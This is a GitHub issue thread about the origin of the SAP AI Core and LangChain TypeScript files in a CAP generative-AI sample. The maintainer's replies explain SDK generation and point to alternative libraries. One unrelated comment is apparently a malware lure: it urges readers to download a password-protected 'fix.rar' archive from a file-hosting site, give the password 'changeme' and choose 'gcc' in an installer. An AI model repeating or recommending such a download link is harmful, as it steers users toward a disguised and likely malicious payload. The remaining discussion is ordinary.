### ISSUE TITLE
Where does all the AI Core code code from in the lightweight api sample?

### ISSUE THREAD

**Issue by js1972** [SAP-samples/btp-cap-genai-rag#27]
There are a lot of typescript files includes in the srv folders for ai core and langchain - where do these come from? How did you create them? Are they generated or copied from somewhere? Lots of *magic* in here...

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kay-schmitteckert** [comment]
Hi @js1972,

Thanks for your request. The typescript files for interacting with SAP AI Core were generated using the SAP Cloud SDK following the steps from the SAP Business Accelerator Hub: https://api.sap.com/api/AI_CORE_API/cloud-sdk/JavaScript

The LangChain wrapper was implemented manually as a custom llm with the help of the base model for the OpenAI api: https://js.langchain.com/v0.1/docs/modules/model_io/llms/custom_llm/

Hope this helps.

Best
Kay

**Comment by js1972** [comment]
Thanks Kay - that makes sense now... As this is referenced from a Mission and Reference Architecture on the Discovery Centre would you consider this a best practice with how to interact with LLMs from a CAP app?
Have you seen the CAP LLM plugin? https://github.com/SAP-samples/cap-llm-plugin-samples.

**Comment by kay-schmitteckert** [comment]
Hi @js1972, please have a look at those sdks and plugins and decide based on your needs:
- https://github.com/SAP/ai-sdk-js
- https://github.com/SAP-samples/cap-llm-plugin-samples

The CAP LLM plugin should also soon be based on the ai-sdk-js.
